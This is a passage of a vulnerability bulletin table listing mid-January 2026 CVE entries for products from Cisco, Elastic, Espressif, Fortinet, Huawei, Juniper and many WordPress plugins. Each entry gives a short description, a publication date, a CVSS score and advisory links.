| Cisco--Cisco Identity Services Engine Software | A vulnerability in the web-based management interface of Cisco Identity Services Engine (ISE) could allow an authenticated, remote attacker to conduct a stored cross-site scripting (XSS) attack against a user of the interface. This vulnerability is due to insufficient validation of user-supplied input by the web-based management interface of an affected system. An attacker could exploit this vulnerability by injecting malicious code into specific pages of the interface. A successful exploit could allow the attacker to execute arbitrary script code in the context of the affected interface or access sensitive, browser-based information. To exploit this vulnerability, the attacker must have valid administrative credentials. | 2026-01-15 | 4.8 | CVE-2026-20076 | cisco-sa-ise-xss-9TDh2kx |
| codepeople--CP Image Store with Slideshow | The CP Image Store with Slideshow plugin for WordPress is vulnerable to authorization bypass in all versions up to, and including, 1.1.9 due to a logic error in the 'cpis_admin_init' function's permission check. This makes it possible for authenticated attackers, with Contributor-level access and above, to import arbitrary products via XML, if the XML file has already been uploaded to the server. | 2026-01-13 | 4.3 | CVE-2026-0684 | https://www.wordfence.com/threat-intel/vulnerabilities/id/28e48604-2aaf-4e02-9b1e-cebf5f0bfcf7?source=cve https://plugins.trac.wordpress.org/browser/cp-image-store/tags/1.1.9/cp-image-store.php#L826 https://plugins.trac.wordpress.org/changeset/3434716/ |
| ConnectWise--PSA | In ConnectWise PSA versions older than 2026.1, certain session cookies were not set with the HttpOnly attribute. In some scenarios, this could allow client-side scripts access to session cookie values. | 2026-01-16 | 6.5 | CVE-2026-0696 | https://www.connectwise.com/company/trust/security-bulletins/2026-01-15-psa-security-fix |
| creativemindssolutions--CM E-Mail Blacklist Simple email filtering for safer registration | The CM E-Mail Blacklist - Simple email filtering for safer registration plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the 'black_email' parameter in all versions up to, and including, 1.6.2. This is due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with administrator-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. This only affects multi-site installations and installations where unfiltered_html has been disabled. | 2026-01-17 | 4.4 | CVE-2026-0691 | https://www.wordfence.com/threat-intel/vulnerabilities/id/821f4ea9-bc25-4d65-9058-5b77c4f1b230?source=cve https://plugins.trac.wordpress.org/browser/cm-email-blacklist/trunk/backend/views/settings/email_blacklist.phtml#L67 https://plugins.trac.wordpress.org/browser/cm-email-blacklist/tags/1.6.2/backend/views/settings/email_blacklist.phtml#L67 https://plugins.trac.wordpress.org/changeset?sfp_email=&sfph_mail=&reponame=&old=3440158%40cm-email-blacklist&new=3440158%40cm-email-blacklist&sfp_email=&sfph_mail= |
| crushpics--Crush.pics Image Optimizer Image Compression and Optimization | The Crush.pics Image Optimizer - Image Compression and Optimization plugin for WordPress is vulnerable to unauthorized modification of data due to missing capability checks on multiple functions in all versions up to, and including, 1.8.7. This makes it possible for authenticated attackers, with Subscriber-level access and above, to modify plugin settings including disabling auto-compression and changing image quality settings. | 2026-01-14 | 4.3 | CVE-2025-14482 | https://www.wordfence.com/threat-intel/vulnerabilities/id/5e71bf15-aee0-4efc-a1c6-faad9f6e4f38?source=cve https://plugins.trac.wordpress.org/browser/crush-pics/trunk/inc/class-ajax.php#L66 https://plugins.trac.wordpress.org/browser/crush-pics/trunk/inc/class-ajax.php#L193 https://plugins.trac.wordpress.org/browser/crush-pics/trunk/inc/class-ajax.php#L30 |
| cubewp1211--CubeWP Framework | The CubeWP plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's cubewp_shortcode_taxonomy shortcode in all versions up to, and including, 1.1.26 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. | 2026-01-17 | 6.4 | CVE-2025-8615 | https://www.wordfence.com/threat-intel/vulnerabilities/id/efc2baf0-38d9-44be-b439-3585b2f1d4a5?source=cve https://wordpress.org/plugins/cubewp-framework/#developers https://plugins.trac.wordpress.org/changeset/3362001#file10 |
| cubewp1211--CubeWP Framework | The CubeWP - All-in-One Dynamic Content Framework plugin for WordPress is vulnerable to Information Exposure in all versions up to, and including, 1.1.27 via the /cubewp-posts/v1/query-new and /cubewp-posts/v1/query REST API endpoints due to insufficient restrictions on which posts can be included. This makes it possible for unauthenticated attackers to extract data from password protected, private, or draft posts that they should not have access to. | 2026-01-17 | 5.3 | CVE-2025-12129 | https://www.wordfence.com/threat-intel/vulnerabilities/id/2006dc4c-ec1a-45ab-94a3-1f86d80e70ca?source=cve https://plugins.trac.wordpress.org/changeset/3422640/cubewp-framework/trunk/cube/classes/class-cubewp-rest-api.php |
| cyberlord92--Integrate Dynamics 365 CRM | The Integrate Dynamics 365 CRM plugin for WordPress is vulnerable to Stored Cross-Site Scripting via admin settings in all versions up to, and including, 1.1.1 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with Administrator-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. | 2026-01-17 | 4.4 | CVE-2026-0725 | https://www.wordfence.com/threat-intel/vulnerabilities/id/6b16028a-0b69-422b-9471-32ea6edb93a0?source=cve https://plugins.trac.wordpress.org/browser/integrate-dynamics-365-crm/trunk/Wrappers/class-templatewrapper.php#L491 https://plugins.trac.wordpress.org/browser/integrate-dynamics-365-crm/tags/1.1.1/Wrappers/class-templatewrapper.php#L491 https://plugins.trac.wordpress.org/changeset/3438502/ |
| Dell--SupportAssist OS Recovery, | Dell SupportAssist OS Recovery, versions prior to 5.5.15.1, contain a Creation of Temporary File With Insecure Permissions vulnerability. A low privileged attacker with local access could potentially exploit this vulnerability, leading to Information Tampering. | 2026-01-13 | 6.6 | CVE-2025-46684 | https://www.dell.com/support/kbdoc/en-us/000401506/dsa-2025-456 |
| dfieldfl--WP Allowed Hosts | The WP Allowed Hosts plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the 'allowed-hosts' parameter in all versions up to, and including, 1.0.8 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with administrator-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. This only affects multi-site installations and installations where unfiltered_html has been disabled. | 2026-01-14 | 4.4 | CVE-2026-0734 | https://www.wordfence.com/threat-intel/vulnerabilities/id/700e9d1c-a178-4033-8607-652178860211?source=cve https://plugins.trac.wordpress.org/browser/wp-allow-hosts/trunk/allowed-hosts.php#L170 https://plugins.trac.wordpress.org/browser/wp-allow-hosts/tags/1.0.8/allowed-hosts.php#L170 |
| e107--e107 CMS | e107 CMS 3.2.1 contains an upload restriction bypass vulnerability that allows authenticated administrators to upload malicious SVG files through the media manager. Attackers with admin privileges can exploit this vulnerability to upload SVG files with embedded cross-site scripting (XSS) payloads that can execute arbitrary scripts when viewed. | 2026-01-13 | 4.8 | CVE-2022-50906 | ExploitDB-50910 Official Vendor Homepage Software Download Page VulnCheck Advisory: e107 CMS v3.2.1 - Admin Upload Restriction Bypass + Stored XSS |
| Elastic--Kibana | Allocation of Resources Without Limits or Throttling (CWE-770) in Kibana Fleet can lead to Excessive Allocation (CAPEC-130) via a specially crafted request. This causes the application to perform redundant processing operations that continuously consume system resources until service degradation or complete unavailability occurs. | 2026-01-13 | 6.5 | CVE-2026-0530 | https://discuss.elastic.co/t/kibana-8-19-10-9-1-10-9-2-4-security-update-esa-2026-03/384521 |
| Elastic--Kibana | Allocation of Resources Without Limits or Throttling (CWE-770) in Kibana Fleet can lead to Excessive Allocation (CAPEC-130) via a specially crafted bulk retrieval request. This requires an attacker to have low-level privileges equivalent to the viewer role, which grants read access to agent policies. The crafted request can cause the application to perform redundant database retrieval operations that immediately consume memory until the server crashes and becomes unavailable to all users. | 2026-01-13 | 6.5 | CVE-2026-0531 | https://discuss.elastic.co/t/kibana-8-19-10-9-1-10-9-2-4-security-update-esa-2026-04/384522 |
| Elastic--Kibana | Improper Input Validation (CWE-20) in Kibana's Email Connector can allow an attacker to cause an Excessive Allocation (CAPEC-130) through a specially crafted email address parameter. This requires an attacker to have authenticated access with view-level privileges sufficient to execute connector actions. The application attempts to process specially crafted email format, resulting in complete service unavailability for all users until manual restart is performed. | 2026-01-13 | 6.5 | CVE-2026-0543 | https://discuss.elastic.co/t/kibana-8-19-10-9-1-10-9-2-4-security-update-esa-2026-08/384523 |
| Elastic--Metricbeat | Improper Validation of Array Index (CWE-129) exists in Metricbeat can allow an attacker to cause a Denial of Service through Input Data Manipulation (CAPEC-153) via specially crafted, malformed payloads sent to the Graphite server metricset or Zookeeper server metricset. Additionally, Improper Input Validation (CWE-20) exists in the Prometheus helper module that can allow an attacker to cause a Denial of Service through Input Data Manipulation (CAPEC-153) via specially crafted, malformed metric data. | 2026-01-13 | 6.5 | CVE-2026-0528 | https://discuss.elastic.co/t/metricbeat-8-19-10-9-1-10-9-2-4-security-update-esa-2026-01/384519 |
| Elastic--Packetbeat | Improper Validation of Array Index (CWE-129) in Packetbeat's MongoDB protocol parser can allow an attacker to cause Overflow Buffers (CAPEC-100) through specially crafted network traffic. This requires an attacker to send a malformed payload to a monitored network interface where MongoDB protocol parsing is enabled. | 2026-01-14 | 6.5 | CVE-2026-0529 | https://discuss.elastic.co/t/packetbeat-8-19-10-9-1-10-9-2-4-security-update-esa-2026-02/384520 |
| electric-studio--Electric Studio Download Counter | The Electric Studio Download Counter plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin settings in all versions up to, and including, 2.4 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with Administrator-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. | 2026-01-14 | 4.4 | CVE-2026-0741 | https://www.wordfence.com/threat-intel/vulnerabilities/id/a22bba3e-423a-4231-833b-c0be57a3bf7b?source=cve https://plugins.trac.wordpress.org/browser/electric-studio-download-counter/trunk/electric-studio-download-counter.php#L186 https://plugins.trac.wordpress.org/browser/electric-studio-download-counter/tags/2.4/electric-studio-download-counter.php#L186 https://plugins.trac.wordpress.org/browser/electric-studio-download-counter/trunk/electric-studio-download-counter.php#L202 https://plugins.trac.wordpress.org/browser/electric-studio-download-counter/tags/2.4/electric-studio-download-counter.php#L202 |
| EnterpriseDB--Postgres Enterprise Manager (PEM) | PEM versions prior to 9.8.1 are affected by a stored Cross-site Scripting (XSS) vulnerability that allows users with access to the Manage Charts menu to inject arbitrary JavaScript when creating a new chart, which is then executed by any user accessing the chart. By default only the superuser and users with pem_admin or pem_super_admin privileges are able to access the Manage Charts menu. | 2026-01-16 | 6.5 | CVE-2026-0949 | https://www.enterprisedb.com/docs/security/advisories/cve20260949/ |
| espressif--esp-usb | Espressif ESP-IDF USB Host UVC Class Driver allows video streaming from USB cameras. Prior to 2.4.0, a vulnerability in the esp-usb UVC host implementation allows a malicious USB Video Class (UVC) device to trigger a stack buffer overflow during configuration-descriptor parsing. When UVC configuration-descriptor printing is enabled, the host prints detailed descriptor information provided by the connected USB device. A specially crafted UVC descriptor may advertise an excessively large length. Because this value is not validated before being copied into a fixed-size stack buffer, an attacker can overflow the buffer and corrupt memory. This vulnerability is fixed in 2.4.0. | 2026-01-12 | 6.8 | CVE-2025-68622 | https://github.com/espressif/esp-usb/security/advisories/GHSA-g65h-9ggq-9827 https://github.com/espressif/esp-usb/commit/77a38b15a17f6e3c7aeb620eb4aeaf61d5194cc0 https://components.espressif.com/components/espressif/usb_host_uvc/versions/2.4.0/changelog |
| espressif--esp-usb | Espressif ESP-IDF USB Host HID (Human Interface Device) Driver allows access to HID devices. Prior to 1.1.0, usb_class_request_get_descriptor() frees and reallocates hid_device->ctrl_xfer when an oversized descriptor is requested but continues to use the stale local pointer, leading to an immediate use-after-free when processing attacker-controlled Report Descriptor lengths. This vulnerability is fixed in 1.1.0. | 2026-01-12 | 6.8 | CVE-2025-68656 | https://github.com/espressif/esp-usb/security/advisories/GHSA-2pm2-62mr-c9x7 https://github.com/espressif/esp-usb/commit/81b37c96593c0bec92ef14c6ee6bf8cab8d8f660 https://components.espressif.com/components/espressif/usb_host_hid/versions/1.1.0/changelog |
| espressif--esp-usb | Espressif ESP-IDF USB Host HID (Human Interface Device) Driver allows access to HID devices. Prior to 1.1.0, calls to hid_host_device_close() can free the same usb_transfer_t twice. The USB event callback and user code share the hid_iface_t state without locking, so both can tear down a READY interface simultaneously, corrupting heap metadata inside the ESP USB host stack. This vulnerability is fixed in 1.1.0. | 2026-01-12 | 6.4 | CVE-2025-68657 | https://github.com/espressif/esp-usb/security/advisories/GHSA-gp8r-qjfr-gqfv https://github.com/espressif/esp-usb/commit/cd28106e9f72ac2719682c06f94601f9f034390b https://components.espressif.com/components/espressif/usb_host_hid/versions/1.1.0/changelog |
| floattechnologies--Float Payment Gateway | The Float Payment Gateway plugin for WordPress is vulnerable to unauthorized modification of data due to improper error handling in the verifyFloatResponse() function in all versions up to, and including, 1.1.9. This makes it possible for unauthenticated attackers to mark any WooCommerce order as failed. | 2026-01-14 | 5.3 | CVE-2025-15513 | https://www.wordfence.com/threat-intel/vulnerabilities/id/b2c7fb39-d128-4285-8bc3-1e192e1e1196?source=cve https://plugins.trac.wordpress.org/browser/float-gateway/tags/1.1.9/index.php#L477 |
| Fortinet--FortiClientEMS | An improper neutralization of special elements used in an SQL command ('SQL Injection') vulnerability [CWE-89] vulnerability in Fortinet FortiClientEMS 7.4.3 through 7.4.4, FortiClientEMS 7.4.0 through 7.4.1, FortiClientEMS 7.2.0 through 7.2.10, FortiClientEMS 7.0 all versions may allow an authenticated attacker with at least read-only admin permission to execute unauthorized SQL code or commands via crafted HTTP or HTTPs requests. | 2026-01-13 | 6.8 | CVE-2025-59922 | https://fortiguard.fortinet.com/psirt/FG-IR-25-735 |
| Fortinet--FortiVoice | An improper limitation of a pathname to a restricted directory ('path traversal') vulnerability in Fortinet FortiVoice 7.2.0 through 7.2.2, FortiVoice 7.0.0 through 7.0.7 allows a privileged attacker to delete files from the underlying filesystem via crafted HTTP or HTTPs requests. | 2026-01-13 | 5.7 | CVE-2025-58693 | https://fortiguard.fortinet.com/psirt/FG-IR-25-778 |
| GeoNetwork--GeoNetwork | Geonetwork 3.10 through 4.2.0 contains an XML external entity vulnerability in PDF rendering that allows attackers to retrieve arbitrary files from the server. Attackers can exploit the insecure XML parser by crafting a malicious XML document with external entity references to read system files through the baseURL parameter in PDF creation requests. | 2026-01-13 | 6.5 | CVE-2022-50899 | ExploitDB-50982 GeoNetwork Official Homepage VulnCheck Advisory: Geonetwork 4.2.0 - XML External Entity (XXE) |
| Geovision--GeoVision Geowebserver | GeoVision GeoWebServer 5.3.3 contains multiple vulnerabilities including local file inclusion, cross-site scripting, and remote code execution through improper input sanitization. Attackers can exploit the WebStrings.srf endpoint by manipulating path traversal and injection parameters to access system files and execute malicious scripts. | 2026-01-15 | 6.2 | CVE-2021-47795 | ExploitDB-50211 GeoVision Cyber Security Page VulnCheck Advisory: GeoVision Geowebserver 5.3.3 - Local FIle Inclusion |
| Gotac--Police Statistics Database System | Police Statistics Database System developed by Gotac has a Absolute Path Traversal vulnerability, allowing unauthenticated remote attackers to enumerate the system file directory. | 2026-01-16 | 5.3 | CVE-2026-1020 | https://www.twcert.org.tw/tw/cp-132-10637-3e4b3-1.html https://www.twcert.org.tw/en/cp-139-10638-0e44b-2.html |
| gothamdev--Gotham Block Extra Light | The Gotham Block Extra Light plugin for WordPress is vulnerable to Arbitrary File Read in all versions up to, and including, 1.5.0 via the 'ghostban' shortcode. This makes it possible for authenticated attackers, with contributor-level access and above, to read the contents of arbitrary files on the server, which can contain sensitive information. | 2026-01-14 | 6.5 | CVE-2025-15020 | https://www.wordfence.com/threat-intel/vulnerabilities/id/b194b241-d8f4-430c-b00c-d84190026bad?source=cve https://plugins.trac.wordpress.org/browser/gotham-block-extra-light/trunk/premium/ghostban.php?marks=56#L56 |
| gothamdev--Gotham Block Extra Light | The Gotham Block Extra Light plugin for WordPress is vulnerable to Stored Cross-Site Scripting via admin settings in all versions up to, and including, 1.5.0 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with administrator-level permissions and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. This only affects multi-site installations and installations where unfiltered_html has been disabled. | 2026-01-14 | 4.4 | CVE-2025-15021 | https://www.wordfence.com/threat-intel/vulnerabilities/id/b4c36899-3c7b-41b6-a38d-86c8834b4c03?source=cve https://plugins.trac.wordpress.org/browser/gotham-block-extra-light/trunk/gothamblock.php?marks=463,470,495,500,504,519,564,578#L463 |
| guillaumev--LinkedIn SC | The LinkedIn SC plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the 'linkedin_sc_date_format', 'linkedin_sc_api_key', and 'linkedin_sc_secret_key' parameters in all versions up to, and including, 1.1.9 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with administrator-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses the injected page. | 2026-01-14 | 4.4 | CVE-2026-0812 | https://www.wordfence.com/threat-intel/vulnerabilities/id/1c4fd888-aeaf-4451-a151-8f884bc22f0b?source=cve https://plugins.trac.wordpress.org/browser/linkedin-sc/tags/1.1.9/linkedin-sc.php#L164 https://plugins.trac.wordpress.org/browser/linkedin-sc/trunk/linkedin-sc.php#L164 |
| gurayyarar--SnipCommand | SnipCommand 0.1.0 contains a cross-site scripting vulnerability that allows attackers to inject malicious payloads into command snippets. Attackers can execute arbitrary code by embedding malicious JavaScript that triggers remote command execution through file or title inputs. | 2026-01-16 | 6.1 | CVE-2021-47841 | ExploitDB-49829 SnipCommand GitHub Repository Proof of Concept Video VulnCheck Advisory: SnipCommand 0.1.0 - Persistent Cross-Site Scripting |
| Hewlett Packard Enterprise (HPE)--ArubaOS (AOS) | A command injection vulnerability in AOS-8 allows an authenticated privileged user to alter a package header to inject shell commands, potentially affecting the execution of internal operations. Successful exploit could allow an authenticated malicious actor to execute commands with the privileges of the impacted mechanism. | 2026-01-13 | 6.5 | CVE-2025-37176 | https://support.hpe.com/hpesc/public/docDisplay?docId=hpesbnw04987en_us&docLocale=en_US |
| Hewlett Packard Enterprise (HPE)--ArubaOS (AOS) | An arbitrary file deletion vulnerability has been identified in the command-line interface of mobility conductors running either AOS-10 or AOS-8 operating systems. Successful exploitation of this vulnerability could allow an authenticated remote malicious actor to delete arbitrary files within the affected system. | 2026-01-13 | 6.5 | CVE-2025-37177 | https://support.hpe.com/hpesc/public/docDisplay?docId=hpesbnw04987en_us&docLocale=en_US |
| Hewlett Packard Enterprise (HPE)--ArubaOS (AOS) | Multiple out-of-bounds read vulnerabilities were identified in a system component responsible for handling certain data buffers. Due to insufficient validation of maximum buffer size values, the process may attempt to read beyond the intended memory region. Under specific conditions, this can result in a crash of the affected process and a potential denial-of-service of the compromised process. | 2026-01-13 | 5.3 | CVE-2025-37178 | https://support.hpe.com/hpesc/public/docDisplay?docId=hpesbnw04987en_us&docLocale=en_US |
| Hewlett Packard Enterprise (HPE)--ArubaOS (AOS) | Multiple out-of-bounds read vulnerabilities were identified in a system component responsible for handling certain data buffers. Due to insufficient validation of maximum buffer size values, the process may attempt to read beyond the intended memory region. Under specific conditions, this can result in a crash of the affected process and a potential denial-of-service of the compromised process. | 2026-01-13 | 5.3 | CVE-2025-37179 | https://support.hpe.com/hpesc/public/docDisplay?docId=hpesbnw04987en_us&docLocale=en_US |
| Hewlett Packard Enterprise (HPE)--EdgeConnect SD-WAN Orchestrator | A vulnerability exists in an Orchestrator service that could allow an unauthenticated remote attacker to bypass multi-factor authentication requirements. Successful exploitation could allow an attacker to create an admin user account without the necessary multi-factor authentication, thereby compromising the integrity of secured access to the system. | 2026-01-14 | 6.5 | CVE-2025-37184 | https://support.hpe.com/hpesc/public/docDisplay?docId=hpesbnw04992en_us&docLocale=en_US |
| Hewlett Packard Enterprise (HPE)--EdgeConnect SD-WAN Orchestrator | Vulnerabilities in the web-based management interface of EdgeConnect SD-WAN Orchestrator could allow an authenticated remote attacker to conduct a stored cross-site scripting (XSS) attacks against an administrative user of the interface. A successful exploit allows an attacker to execute arbitrary script code in a victim's browser in the context of the affected interface and thereby make unauthorized arbitrary configuration changes to the host. | 2026-01-14 | 5.5 | CVE-2025-37185 | https://support.hpe.com/hpesc/public/docDisplay?docId=hpesbnw04992en_us&docLocale=en_US |
| Huawei--HarmonyOS | Permission verification bypass vulnerability in the media library module. Impact: Successful exploitation of this vulnerability may affect service confidentiality. | 2026-01-14 | 6.2 | CVE-2025-68959 | https://consumer.huawei.com/en/support/bulletin/2026/1// https://consumer.huawei.com/en/support/bulletinwearables/2026/1/ https://consumer.huawei.com/en/support/bulletinvision/2026/1/ |
| Huawei--HarmonyOS | Data verification vulnerability in the HiView module. Impact: Successful exploitation of this vulnerability may affect availability. | 2026-01-14 | 6.2 | CVE-2025-68964 | https://consumer.huawei.com/en/support/bulletin/2026/1// https://consumer.huawei.com/en/support/bulletinlaptops/2026/1// https://consumer.huawei.com/en/support/bulletinwearables/2026/1/ https://consumer.huawei.com/en/support/bulletinvision/2026/1/ |
| Huawei--HarmonyOS | Multi-thread race condition vulnerability in the thermal management module. Impact: Successful exploitation of this vulnerability may affect availability. | 2026-01-14 | 6.8 | CVE-2025-68969 | https://consumer.huawei.com/en/support/bulletin/2026/1// https://consumer.huawei.com/en/support/bulletinlaptops/2026/1// |
| Huawei--HarmonyOS | Permission verification bypass vulnerability in the media library module. Impact: Successful exploitation of this vulnerability may affect service confidentiality. | 2026-01-14 | 6.1 | CVE-2025-68970 | https://consumer.huawei.com/en/support/bulletin/2026/1// https://consumer.huawei.com/en/support/bulletinwearables/2026/1/ https://consumer.huawei.com/en/support/bulletinvision/2026/1/ |
| Huawei--HarmonyOS | Multi-thread race condition vulnerability in the camera framework module. Impact: Successful exploitation of this vulnerability may affect availability. | 2026-01-14 | 5.1 | CVE-2025-68961 | https://consumer.huawei.com/en/support/bulletin/2026/1// https://consumer.huawei.com/en/support/bulletinlaptops/2026/1// |
| Huawei--HarmonyOS | Multi-thread race condition vulnerability in the camera framework module. Impact: Successful exploitation of this vulnerability may affect availability. | 2026-01-14 | 5.1 | CVE-2025-68962 | https://consumer.huawei.com/en/support/bulletin/2026/1// https://consumer.huawei.com/en/support/bulletinlaptops/2026/1// |
| Huawei--HarmonyOS | Man-in-the-middle attack vulnerability in the Clone module. Impact: Successful exploitation of this vulnerability may affect service confidentiality. | 2026-01-14 | 5.7 | CVE-2025-68963 | https://consumer.huawei.com/en/support/bulletin/2026/1// |
| Huawei--HarmonyOS | Permission control vulnerability in the Notepad module. Impact: Successful exploitation of this vulnerability may affect service confidentiality. | 2026-01-14 | 5.1 | CVE-2025-68966 | https://consumer.huawei.com/en/support/bulletin/2026/1// https://consumer.huawei.com/en/support/bulletinlaptops/2026/1// https://consumer.huawei.com/en/support/bulletinvision/2026/1/ |
| Huawei--HarmonyOS | Vulnerability of improper permission control in the print module. Impact: Successful exploitation of this vulnerability may affect service confidentiality. | 2026-01-14 | 5.7 | CVE-2025-68967 | https://consumer.huawei.com/en/support/bulletin/2026/1// https://consumer.huawei.com/en/support/bulletinlaptops/2026/1// |
| Huawei--HarmonyOS | Permission control vulnerability in the Notepad module. Impact: Successful exploitation of this vulnerability may affect service confidentiality. | 2026-01-14 | 4.7 | CVE-2025-68965 | https://consumer.huawei.com/en/support/bulletin/2026/1// https://consumer.huawei.com/en/support/bulletinlaptops/2026/1// https://consumer.huawei.com/en/support/bulletinvision/2026/1/ |
| Istio--Istio | Istio through 1.28.2 allows iptables rule injection for changing firewall behavior via the traffic.sidecar.istio.io/excludeInterfaces annotation. NOTE: the reporter's position is "this doesn't represent a security vulnerability (pod creators can already exclude sidecar injection entirely)." | 2026-01-15 | 4.1 | CVE-2026-23766 | https://github.com/istio/istio/issues/58781 https://github.com/istio/istio/pull/58785 |
| itsourcecode--Society Management System | A vulnerability was detected in itsourcecode Society Management System 1.0. Impacted is an unknown function of the file /admin/add_activity.php. Performing a manipulation of the argument Title results in sql injection. It is possible to initiate the attack remotely. The exploit is now public and may be used. | 2026-01-18 | 6.3 | CVE-2026-1118 | VDB-341710 | itsourcecode Society Management System add_activity.php sql injection VDB-341710 | CTI Indicators (IOB, IOC, TTP, IOA) Submit #734289 | itsourcecode Society Management System V1.0 SQL injection https://github.com/AriazzzZ/CVE/issues/2 https://itsourcecode.com/ |
| jackdewey--Community Events | The Community Events plugin for WordPress is vulnerable to unauthorized modification of data due to a missing capability check on the ajax_admin_event_approval() function in all versions up to, and including, 1.5.6. This makes it possible for unauthenticated attackers to approve arbitrary events via the 'eventlist' parameter. | 2026-01-17 | 5.3 | CVE-2025-14029 | https://www.wordfence.com/threat-intel/vulnerabilities/id/098c3f4c-b6bc-462a-98ef-30e6a68d74cf?source=cve https://plugins.trac.wordpress.org/browser/community-events/trunk/community-events.php#L160 https://plugins.trac.wordpress.org/browser/community-events/tags/1.5.5/community-events.php#L160 https://plugins.trac.wordpress.org/browser/community-events/tags/1.5.5/community-events.php#L64 https://plugins.trac.wordpress.org/changeset?sfp_email=&sfph_mail=&reponame=&old=3437116%40community-events&new=3437116%40community-events&sfp_email=&sfph_mail= |
| jersou--Markdown Explorer | Markdown Explorer 0.1.1 contains a cross-site scripting vulnerability that allows attackers to inject malicious code through file uploads and editor inputs. Attackers can upload markdown files with embedded JavaScript payloads to execute remote commands and potentially gain system access. | 2026-01-16 | 6.1 | CVE-2021-47836 | ExploitDB-49826 Markdown Explorer GitHub Repository Proof of Concept Video VulnCheck Advisory: Markdown Explorer 0.1.1 - Persistent Cross-Site Scripting |
| jokkedk--Webgrind | Webgrind 1.1 and before contains a reflected cross-site scripting vulnerability that allows unauthenticated attackers to inject malicious scripts via the file parameter in index.php. The application does not sufficiently encode user-controlled inputs, allowing attackers to execute arbitrary JavaScript in victim's browsers by crafting malicious URLs. | 2026-01-13 | 6.1 | CVE-2023-54341 | ExploitDB-51074 Webgrind GitHub Repository VulnCheck Advisory: Webgrind 1.1 - Reflected Cross-Site Scripting (XSS) via file Parameter |
| Juniper Networks--Junos OS | An Improper Handling of Exceptional Conditions vulnerability in packet processing of Juniper Networks Junos OS allows an unauthenticated, network-adjacent attacker sending a specifically malformed ICMP packet to cause an FPC to crash and restart, resulting in a Denial of Service (DoS). When an ICMP packet is received with a specifically malformed IP header value, the FPC receiving the packet crashes and restarts. Due to the specific type of malformed packet, adjacent upstream routers would not forward the packet, limiting the attack surface to adjacent networks. This issue only affects ICMPv4. ICMPv6 is not vulnerable to this issue. This issue affects Junos OS: * all versions before 21.2R3-S9, * from 21.4 before 21.4R3-S10, * from 22.2 before 22.2R3-S7, * from 22.3 before 22.3R3-S4, * from 22.4 before 22.4R3-S5, * from 23.2 before 23.2R2-S3, * from 23.4 before 23.4R2-S3, * from 24.2 before 24.2R1-S2, 24.2R2. | 2026-01-15 | 6.5 | CVE-2026-0203 | https://supportportal.juniper.net/JSA104294 https://kb.juniper.net/JSA104294 |
| Juniper Networks--Junos OS | A Stack-based Buffer Overflow vulnerability in the Packet Forwarding Engine (pfe) of Juniper Networks Junos OS allows a network-based attacker, authenticated with low privileges to cause a Denial-of-Service (DoS). Subscribing to telemetry sensors at scale causes all FPC connections to drop, resulting in an FPC crash and restart. The issue was not seen when YANG packages for the specific sensors were installed. This issue affects Junos OS: * all versions before 22.4R3-S7, * 23.2 version before 23.2R2-S4, * 23.4 versions before 23.4R2. | 2026-01-15 | 6.5 | CVE-2026-21903 | https://supportportal.juniper.net/JSA106022 https://kb.juniper.net/JSA106022 |
| Juniper Networks--Junos OS | A Missing Release of Memory after Effective Lifetime vulnerability in the routing protocol daemon (rpd) Juniper Networks Junos OS and Junos OS Evolved allows an unauthenticated attacker controlling an adjacent IS-IS neighbor to send a specific update packet causing a memory leak. Continued receipt and processing of these packets will exhaust all available memory, crashing rpd and creating a Denial of Service (DoS) condition. Memory usage can be monitored through the use of the 'show task memory detail' command. For example: user@junos> show task memory detail | match ted-infra TED-INFRA-COOKIE 25 1072 28 1184 229 user@junos> show task memory detail | match ted-infra TED-INFRA-COOKIE 31 1360 34 1472 307 This issue affects: Junos OS: * from 23.2 before 23.2R2, * from 23.4 before 23.4R1-S2, 23.4R2, * from 24.1 before 24.1R2; Junos OS Evolved: * from 23.2 before 23.2R2-EVO, * from 23.4 before 23.4R1-S2-EVO, 23.4R2-EVO, * from 24.1 before 24.1R2-EVO. This issue does not affect Junos OS versions before 23.2R1 or Junos OS Evolved versions before 23.2R1-EVO. | 2026-01-15 | 6.5 | CVE-2026-21909 | https://supportportal.juniper.net/JSA106008 https://kb.juniper.net/JSA106008 |
| Juniper Networks--Junos OS | An Improper Check for Unusual or Exceptional Conditions vulnerability in the packet forwarding engine (PFE) of Juniper Networks Junos OS on EX4k Series and QFX5k Series platforms allows an unauthenticated network-adjacent attacker flapping an interface to cause traffic between VXLAN Network Identifiers (VNIs) to drop, leading to a Denial of Service (DoS). On all EX4k and QFX5k platforms, a link flap in an EVPN-VXLAN configuration Link Aggregation Group (LAG) results in Inter-VNI traffic dropping when there are multiple load-balanced next-hop routes for the same destination. This issue is only applicable to systems that support EVPN-VXLAN Virtual Port-Link Aggregation Groups (VPLAG), such as the QFX5110, QFX5120, QFX5200, EX4100, EX4300, EX4400, and EX4650. Service can only be restored by restarting the affected FPC via the 'request chassis fpc restart slot <slot-number>' command. This issue affects Junos OS on EX4k and QFX5k Series: * all versions before 21.4R3-S12, * all versions of 22.2 * from 22.4 before 22.4R3-S8, * from 23.2 before 23.2R2-S5, * from 23.4 before 23.4R2-S5, * from 24.2 before 24.2R2-S3, * from 24.4 before 24.4R2. | 2026-01-15 | 6.5 | CVE-2026-21910 | https://supportportal.juniper.net/JSA106009 https://kb.juniper.net/JSA106009 |
